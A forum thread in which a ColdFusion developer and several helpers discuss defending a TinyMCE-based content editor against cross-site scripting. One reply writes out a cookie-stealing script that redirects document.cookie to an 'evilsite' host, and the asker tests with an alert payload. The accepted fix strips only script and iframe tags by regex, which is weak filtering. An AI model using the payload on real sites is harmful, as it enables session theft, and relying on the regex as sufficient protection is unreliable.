Your question, your audience. Choose who sees your identity—and your question—with question security.
question about HTMLEditFormat()
I'm concerned about XSS attacks. I did some reading about, and have tried to implement, the HTMLEditFormat() function.
However, when I use HTMLEditFormat() in a form input, or in a CFOUTPUT, the output on the page is the raw HTML code.
For example, if I do this:
http://www.coalcountryteam.org/index.cfm?PageID=76
Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?
Sorry to be asking so many questions of late. =) I really appreciate people's time.
Eric B
However, when I use HTMLEditFormat() in a form input, or in a CFOUTPUT, the output on the page is the raw HTML code.
For example, if I do this:
<cfquery name="UpdatePage" datasource="#ds#">
UPDATE tbl_acct_navigation
SET
PageTitle = <cfqueryparam cfsqltype="cf_sql_varchar" value="#HTMLEditFormat(form.PageTitle)#">,
PageContentLeft = <cfqueryparam cfsqltype="cf_sql_varchar" value="#HTMLEditFormat(form.PageContentLeft)#">,
PageContentRight = <cfqueryparam cfsqltype="cf_sql_varchar" value="#HTMLEditFormat(form.PageContentRight)#">,
DateModified = <cfqueryparam cfsqltype="cf_sql_timestamp" value="#now()#">
WHERE PageID = <cfqueryparam cfsqltype="cf_sql_integer" value="#val(form.PageID)#">
</cfquery>
http://www.coalcountryteam.org/index.cfm?PageID=76
Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?
Sorry to be asking so many questions of late. =) I really appreciate people's time.
Eric B
Asked:
9-
7
4- +2
10 Solutions
The first question is, what do you want the user to be able to enter into your form?
If you can say, no HTML at all, then you just need a regular expression that strips out any invalid characters such as < > tags..
If you keep the data from getting submitted by the form, then it's easier to handle displaying it back on the page
> the HTML is not parsed by the browser. You can see it here:
I think you don't realize it, but this IS the desired result.
Test Page
<p>"Testing" & <script></p>
You have done exactly what you intended to do, you have prevented this code from being executed and harming your site.
The only problem MAY be, that you are keeping simple commands such as bold and italic from being used. That's the question of my first post, if you don't want these, then you are all set. If you do, you need more intelligent filtering to try and allow some HTML command and not the other tags.
Or you can do like EE does, see the icons at the top of the dialog boxes? Then enter "fake" HTML like command such as [ bold ] and [ underline ]. Then in your code, you translate this into a real HTML bold tag..
Just depends on what you want.. some tags, no tags..
I think you don't realize it, but this IS the desired result.
Test Page
<p>"Testing" & <script></p>
You have done exactly what you intended to do, you have prevented this code from being executed and harming your site.
The only problem MAY be, that you are keeping simple commands such as bold and italic from being used. That's the question of my first post, if you don't want these, then you are all set. If you do, you need more intelligent filtering to try and allow some HTML command and not the other tags.
Or you can do like EE does, see the icons at the top of the dialog boxes? Then enter "fake" HTML like command such as [ bold ] and [ underline ]. Then in your code, you translate this into a real HTML bold tag..
Just depends on what you want.. some tags, no tags..
Darn. I just typed a careful reply here, and lost it when I tried to include a screencast. ~sigh~
gdemaria it is good to hear from you.
I want to include almost all HTML. I use the TinyMCE editor to allow this client to enter content and update her web pages. I also need to use a wide range of HTML tags, so I don't want to block any valid HTML tags.
I would like to block stuff like <script>/remotehost/terrib
So I don't know if the HTMLEditFormat function is what I need. The Nadel article was great -- I like his blog a lot -- but Nadel mentions that developers need to be careful about escaping necessary HTML. (There are also some interesting notes about the vulnerabilities of scriptProtect. I have disabled scriptProtect in application.cfc, so that my client can embed video and slideshows using EMBED and OBJECT tags. Yet I wonder if in doing so I have made my application more vulnerable.)
So, I have been reading about XSS vulnerabilities, and I want to secure my application against them as much as I can; however, I don't know if HTMLEditFormat is what I need.
HTMLEditFormat makes my test page display HTML code -- which makes sense, given the way that I have used it.
Is HTMLEditFormat the right solution for this task? Is there a better way to block:
<script>/remotehost/terrib
Thank you again. Hope you are well.
Eric
gdemaria it is good to hear from you.
I want to include almost all HTML. I use the TinyMCE editor to allow this client to enter content and update her web pages. I also need to use a wide range of HTML tags, so I don't want to block any valid HTML tags.
I would like to block stuff like <script>/remotehost/terrib
So I don't know if the HTMLEditFormat function is what I need. The Nadel article was great -- I like his blog a lot -- but Nadel mentions that developers need to be careful about escaping necessary HTML. (There are also some interesting notes about the vulnerabilities of scriptProtect. I have disabled scriptProtect in application.cfc, so that my client can embed video and slideshows using EMBED and OBJECT tags. Yet I wonder if in doing so I have made my application more vulnerable.)
So, I have been reading about XSS vulnerabilities, and I want to secure my application against them as much as I can; however, I don't know if HTMLEditFormat is what I need.
HTMLEditFormat makes my test page display HTML code -- which makes sense, given the way that I have used it.
Is HTMLEditFormat the right solution for this task? Is there a better way to block:
<script>/remotehost/terrib
Thank you again. Hope you are well.
Eric
here is the one script tha can really help in you in your XSS attacks!
in Application.cfm write this function
<cfset request.XSSAttacks = "(script)|(<)|(>)|(%3c)|(%
Now in your action Pages! Do something like this!
<cfif REFindNoCase("request.XSSA
XSS Attack Found! Stop Processing
<cfelse>
Continue
</cfif>
in Application.cfm write this function
<cfset request.XSSAttacks = "(script)|(<)|(>)|(%3c)|(%
Now in your action Pages! Do something like this!
<cfif REFindNoCase("request.XSSA
XSS Attack Found! Stop Processing
<cfelse>
Continue
</cfif>
> HTMLEditFormat makes my test page display HTML code
Exactly, so you don't want to use it because you do want to keep most of your HTML.
When a user submits their content, then you can strip out any <script> tags using something like this...
<cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>",
change "text" to your form variable
myselfrandhawa, your script is too restrictive. It will block too much. Even if the user enters simple text like "The teachers' union will update the parents about the new grant proposal"
Exactly, so you don't want to use it because you do want to keep most of your HTML.
When a user submits their content, then you can strip out any <script> tags using something like this...
<cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>",
change "text" to your form variable
myselfrandhawa, your script is too restrictive. It will block too much. Even if the user enters simple text like "The teachers' union will update the parents about the new grant proposal"
Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?
Eric, hopefully you have done your research, XSS attacks are of 3 types,
Persistent
Non-Persistent
and DOM-Based
Let's consider a BLOG where users are allowed to post comments, in the comment I can post the below script, which sends your cookies to other website
<script type="text/javascript">
document.location='http://www.yoursite.com?' + document.cookie;
</script>
so to stop this you can use HTMLEditFormat()
and the above code will become
<script type="text/javascript">
document.location='http://www.evilsite.com?' + document.cookie;
</script>
and will NOT execute..
<cfoutput>#HTMLEditFormat(
Another method for reducing XSS vulnerability is to enable script protection. This can be done globally in the ColdFusion Administrator, or on a per-application basis in Application.cfc.
Script Protection monitors the Form, URL, CGI, and Cookie scopes looking for potentionally threatening tags. The tags it looks for are: object, embed, script, applet, and meta. If it finds any of these tags, or any that resemble them, it will replace them with and InvalidTag tag.
To enable Global Script Protection:
1. Go to you ColdFusion Administrator
2. Go into the Server Settings section on the left
3. Under "settings" you will find the check box "Enable Global Script Protection". Check it
4. Click "Submit Changes"
This turns on Script Protection for All Scopes on All Applications on the server.
If you want to control script protection at the application level, or you do not have access to the ColdFusion Administrator, you can enable it in your Application.cfc by placing this line in the pseudo-constructor area:
<cfset this.scriptprotect="all">
This will enable script protection for only that application, but for all scopes. You can also place place a comma delimited list of scopes to protect, if for some reason you do not want to protect them all.
Script Protection, just like HTMLEditFormat(), can also be over-protective, because it will also find tags that are harmless but resemble the potentially dangerous tags.
Here is a post which talks about FORMS and XSS...
http://blog.webdh.com/index.cfm/2008/6/25/Useful-checks-to-test-for-XSS-attacks-on-your-ColdFusion-site
http://blog.webdh.com/index.cfm/2008/6/25/Useful-checks-to-test-for-XSS-attacks-on-your-ColdFusion-site
Brijesh, do you actually read anything before making your posts?
The author wants to have HTML in this post so cannot use HTMLeditFormat(), script protection and cannot strip out all HTML as your links states.
Eric, you need to selectively remove the tags that you don't want as I showed in my post
brijeshchauhan, myselfrandhawa, and gdemaria,
I have a lot to think about, and much more reading and research to do.
I have indeed enabled Global Script Protection in ColdFusion Administrator.
However, in my application.cfc file, I disabled Global Script Protection using:
<cfset this.scriptProtect = "No">
Why did I do that? Because Script Protection did not let me use EMBED and OBJECT tags, which are required when one wants to embed media from Flickr or Picasa. This feature is very important to this particular client.
This does make me a little nervous. Even though the administrative interface is inside a password protected folder, I don't like to have scriptProtect disabled without using some other kind of protection against XSS.
I will try gdemaria's script; I will also do some more reading as suggested by brijeshchauhan. I really appreciate everybody's very helpful comments. I will get back here later today. Hope you are all having a great day.
Eric
I have a lot to think about, and much more reading and research to do.
I have indeed enabled Global Script Protection in ColdFusion Administrator.
However, in my application.cfc file, I disabled Global Script Protection using:
<cfset this.scriptProtect = "No">
Why did I do that? Because Script Protection did not let me use EMBED and OBJECT tags, which are required when one wants to embed media from Flickr or Picasa. This feature is very important to this particular client.
This does make me a little nervous. Even though the administrative interface is inside a password protected folder, I don't like to have scriptProtect disabled without using some other kind of protection against XSS.
I will try gdemaria's script; I will also do some more reading as suggested by brijeshchauhan. I really appreciate everybody's very helpful comments. I will get back here later today. Hope you are all having a great day.
Eric
The author has mentioned this...
Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?
So just had him show on it...
Anyways, if the post is not useful, then it can be ignored.. it's up to the author..
Where should I implement HTMLEditFormat() to add a little protection against XSS attacks?
So just had him show on it...
Anyways, if the post is not useful, then it can be ignored.. it's up to the author..
brij, I always appreciate your input.
I post many questions in this ColdFusion forum -- and I always get many very helpful replies. I have an abiding gratitude for everybody here.
I'm also aware that I need to contribute more, myself, in areas in which I have more experience: CSS, for example, and support for PC and Macintosh hardware and software.
Thank you for your help. =) I'm going to try gdemaria's Regular Expression Replace idea:
<cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>",
... and see what happens. I have read your replies carefully and I really appreciate your time.
Eric
I post many questions in this ColdFusion forum -- and I always get many very helpful replies. I have an abiding gratitude for everybody here.
I'm also aware that I need to contribute more, myself, in areas in which I have more experience: CSS, for example, and support for PC and Macintosh hardware and software.
Thank you for your help. =) I'm going to try gdemaria's Regular Expression Replace idea:
<cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>",
... and see what happens. I have read your replies carefully and I really appreciate your time.
Eric
@ eric, Its all Upon your requirements what exactly you want to try!
My Suggestion will be use all the inputs provided by us and implemented it!
My, Brij, gd all of us have provided you different approaches so i think you can create a combination of all three and that can help you a lot in making ur application secure!
if you want to know more about the stopping of attacks! just read the below:
http://www.coldfusioncookbook.com/entry/36/How-can-I-prevent-SQL-injection-attacks?
My Suggestion will be use all the inputs provided by us and implemented it!
My, Brij, gd all of us have provided you different approaches so i think you can create a combination of all three and that can help you a lot in making ur application secure!
if you want to know more about the stopping of attacks! just read the below:
http://www.coldfusioncookbook.com/entry/36/How-can-I-prevent-SQL-injection-attacks?
Eric, there is also one project called antisamy based on Java which can be used for protecting website against XSS attacks.. it's open source and can be downloaded from
http://code.google.com/p/owaspantisamy/downloads/list
and it's implementation is blogged in the following post
http://blog.pengoworks.com/index.cfm/2008/1/3/Using-AntiSamy-to-protect-your-CFM-pages-from-XSS-hacks
You can give it a try...
http://code.google.com/p/owaspantisamy/downloads/list
and it's implementation is blogged in the following post
http://blog.pengoworks.com/index.cfm/2008/1/3/Using-AntiSamy-to-protect-your-CFM-pages-from-XSS-hacks
You can give it a try...
Nice to see a good discussion .
I personally like this
http://www.codfusion.com/blog/page.cfm/projects/portcullis
it has good functions like
filterSQL,filterwords ,badSQLContext ,escapeChars,isvalidcfvari
At the starting of the cfc you can see
<cfset variables.instance.sqlFilt
<cfset variables.instance.tagFilt
<cfset variables.instance.wordFil
so you remove or add to this lists with ones you want which will handled in that CFC
hope this help.
I personally like this
http://www.codfusion.com/blog/page.cfm/projects/portcullis
it has good functions like
filterSQL,filterwords ,badSQLContext ,escapeChars,isvalidcfvari
At the starting of the cfc you can see
<cfset variables.instance.sqlFilt
<cfset variables.instance.tagFilt
<cfset variables.instance.wordFil
so you remove or add to this lists with ones you want which will handled in that CFC
hope this help.
Eric, you are very gratious and always open and kind. That makes you a pleasure to help.
Let me be very clear about my concern. I agree that input from multiple people IS IMPORTANT; it is a core benefit of experts-exchange.
I get frustrated, however, when moving down a path with an asker and someone posts things that derail the conversation; posts that do not continue down the path towards the resolution. As you know Eric, your question threads can be very long; each post needs to build upon previous posts until we get to where we need to be.
As an Example, Brijesh, you provided links to HTMLeditFormat(), Script Protection, stripping out all HTML from form fields. MySelfrandhawa, suggested stripping out all html and stripping out keywords.
IMO, none of these are applicable and only slow down the process and add confusion.
But of course, this is my opinion, and I others may disagree. Having multiple opinions is great for education and helps finds creative solutions. So, given that, I suggest Brijesh and Myselfrandhawa, that if you're going to post infromation that is *against* what an expert has sugested or against what the *asker wants*, you need to either (1) say you disagree and why or (2) say that this information is NOT the solution, but may be interesting to read.
I feel like this thread is now in many different directions and will be much harder to resolve. If you do what Myselfrandhawa suggested and combine all of the suggestions, it will not work and you will just spin your wheels.
I'm working with gdemaria's idea to use <cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>",
I implemented that code in my edit page -- the page in which the user updates database records. I use this code, below:
and I get an error, which I note below.
srikanthmadis, I saw the Portcullis application and it looks very useful -- and that is something I am going to check out further.
brij and myselfrandhawa -- I am going to follow up separately about the excellent resources that you have recommended. I do think that HTMLeditFormat() is not the right solution for this particular problem but I do see that it is very useful in other solutions. I really appreciate your help.
Per gdemaria's notes I am going to first try to get <cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>",
to work. That looks like a very useful solution for this particular problem.
Thanks again to all.
E
I implemented that code in my edit page -- the page in which the user updates database records. I use this code, below:
<!--- set up protection against XSS --->
<cfset form.PageTitle) = ReReplaceNoCase (form.PageTitle), "<script.*?>.*?</script>", "", "all")>
<cfset form.PageContentLeft) = ReReplaceNoCase (form.PageContentLeft), "<script.*?>.*?</script>", "", "all")>
<cfset form.PageContentRight) = ReReplaceNoCase (form.PageContentRight), "<script.*?>.*?</script>", "", "all")>
and I get an error, which I note below.
srikanthmadis, I saw the Portcullis application and it looks very useful -- and that is something I am going to check out further.
brij and myselfrandhawa -- I am going to follow up separately about the excellent resources that you have recommended. I do think that HTMLeditFormat() is not the right solution for this particular problem but I do see that it is very useful in other solutions. I really appreciate your help.
Per gdemaria's notes I am going to first try to get <cfset text = ReReplaceNoCase (text, "<script.*?>.*?</script>",
to work. That looks like a very useful solution for this particular problem.
Thanks again to all.
E
error text:
Error Occurred While Processing Request
Invalid CFML construct found on line 14 at column 22.
ColdFusion was looking at the following text:<p>)</p><p>The CFML compiler was processing:<ul><li>A cfset tag beginning on line 14, column 2.</ul>
The error occurred in C:/websites/www.coalcountryteam.org/admin/editPages.cfm: line 14
12 :
13 : <!--- set up protection against XSS scripts --->
14 : <cfset form.PageTitle) = ReReplaceNoCase (form.PageTitle), "<script.*?>.*?</script>", "", "all")>
15 : <cfset form.PageContentLeft) = ReReplaceNoCase (form.PageContentLeft), "<script.*?>.*?</script>", "", "all")>
16 : <cfset form.PageContentRight) = ReReplaceNoCase (form.PageContentRight), "<script.*?>.*?</script>", "", "all")>
I might need to provide more information about the edit page -- it's simple. I use a CFINPUT tag to update PageTitle:
And I use a textarea input field to update Page Content for the left and right sides of the page; example:
I implement the TinyMCE javascript editor to apply a WYSIWYG interface to the textarea, for the convenience of the end user.
<p><strong>Page Title:</strong>
<cfinput
type="Text"
name="PageTitle"
value="#Trim(form.PageTitle)#"
message="Please enter a Document Title."
required="Yes"
validateAt="onSubmit,onServer"
size="50"
maxlength="255"></p>
And I use a textarea input field to update Page Content for the left and right sides of the page; example:
<textarea name="PageContentLeft"
width="770"
height="800"
style="width:770px;height:800px;" wrap="virtual">
<cfoutput>#form.PageContentLeft#</cfoutput>
</textarea>
I implement the TinyMCE javascript editor to apply a WYSIWYG interface to the textarea, for the convenience of the end user.
Eric, you have a couple of simple type-o
In each of the lines, you have a ) before the equal sign and again after the variable name
<cfset form.PageTitle) = ReReplaceNoCase (form.PageTitle), "<script.*?>.*?</script>",
^^^ ^^^
It should be like this...
<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<script.*?>.*?</script>",
Please check the other lines, they have the same issue..
In each of the lines, you have a ) before the equal sign and again after the variable name
<cfset form.PageTitle) = ReReplaceNoCase (form.PageTitle), "<script.*?>.*?</script>",
^^^ ^^^
It should be like this...
<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<script.*?>.*?</script>",
Please check the other lines, they have the same issue..
One addition to make, Check this article by SIDFISH' a Cf Community GURU
http://sidfishes.wordpress.com/2009/03/17/60/
http://sidfishes.wordpress.com/2009/03/17/60/
Eric,
Don't confuse SQL injection attacks with XSS attacks. You have handled SQL injection in the past. Focusing on XSS, you don't want to be overly restrictive because you want HTML to be accepted. However, the Sid Fish article does raise a good point, you should probably block iFrames as well. But that is first a business decision, when the user enters his own html, do you want him/her to be able to put in an iFrame, if not, add that to the cleaning script...
<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<script.*?>.*?</script>",
<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<iframe.*?>.*?</iframe>",
Don't confuse SQL injection attacks with XSS attacks. You have handled SQL injection in the past. Focusing on XSS, you don't want to be overly restrictive because you want HTML to be accepted. However, the Sid Fish article does raise a good point, you should probably block iFrames as well. But that is first a business decision, when the user enters his own html, do you want him/her to be able to put in an iFrame, if not, add that to the cleaning script...
<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<script.*?>.*?</script>",
<cfset form.PageTitle = ReReplaceNoCase (form.PageTitle, "<iframe.*?>.*?</iframe>",
gdemaria,
>>>In each of the lines, you have a ) before the equal sign and again after the variable name
Of course. Thank you. =)
I believe it is working. I tested by typing
"><script>alert("XSS")</sc
into the text update field; then saved the page. Then I view the updated page, but a javascript alert does not pop up, and in the source code the script tags have been removed. However I can paste in all other HTML. This is exactly what I needed.
>>>Don't confuse SQL injection attacks with XSS attacks.
Yep. I understand the difference. We handled a SQL injection in April of 2010 -- I remember it well.
brijeshchauhan and srikanthmadis, I am going to check out portcullis further. At this point I feel I am pretty well protected; I have a password-protected edit page that does not allow the script tag, but allows embed, object, and most other HTML tags.
I also found an option in TinyMCE that strips away selected tags:
invalid_elements : "b,i,script",
I added this line to my TinyMCE initialization code, to disallow the deprecated tags "i" and "b" and the dangerous tag "script".
I'm going to allow iframes for now. YouTube uses them, and this client embeds video from Youtube, so for now I need to accommodate her need for iframes unless a real security problem comes up.
I really appreciate all input. I'm going to close this question, with a lot of gratitude. I would like to award 500 points to everyone who contributed. I will give the majority of the points to gdemaria, who kept this question on task and provided an elegant solution. But I want to stress how grateful I am to myselfrandhawa, srikanthmadis…, and brijeshchauhan. I look forward to working with you again.
My small part of the internet is safer than it was before. ;-)
Eric
>>>In each of the lines, you have a ) before the equal sign and again after the variable name
Of course. Thank you. =)
I believe it is working. I tested by typing
"><script>alert("XSS")</sc
into the text update field; then saved the page. Then I view the updated page, but a javascript alert does not pop up, and in the source code the script tags have been removed. However I can paste in all other HTML. This is exactly what I needed.
>>>Don't confuse SQL injection attacks with XSS attacks.
Yep. I understand the difference. We handled a SQL injection in April of 2010 -- I remember it well.
brijeshchauhan and srikanthmadis, I am going to check out portcullis further. At this point I feel I am pretty well protected; I have a password-protected edit page that does not allow the script tag, but allows embed, object, and most other HTML tags.
I also found an option in TinyMCE that strips away selected tags:
invalid_elements : "b,i,script",
I added this line to my TinyMCE initialization code, to disallow the deprecated tags "i" and "b" and the dangerous tag "script".
I'm going to allow iframes for now. YouTube uses them, and this client embeds video from Youtube, so for now I need to accommodate her need for iframes unless a real security problem comes up.
I really appreciate all input. I'm going to close this question, with a lot of gratitude. I would like to award 500 points to everyone who contributed. I will give the majority of the points to gdemaria, who kept this question on task and provided an elegant solution. But I want to stress how grateful I am to myselfrandhawa, srikanthmadis…, and brijeshchauhan. I look forward to working with you again.
My small part of the internet is safer than it was before. ;-)
Eric
Question has a verified solution.
Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.
Have a better answer? Share it in a comment.
Join & Write a Comment Already a member? Login.
Featured Post
Check which ports are open to the outside world. Helps make sure that your firewall rules are working as intended.
One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.
Tackle projects and never again get stuck behind a technical roadblock.
Join Now
Here's a great Ben Nadel article on the topic..
http://www.bennadel.com/blog/2004-Escaping-Form-Values-Understanding-The-ColdFusion-htmlEditFormat-Life-Cycle.htm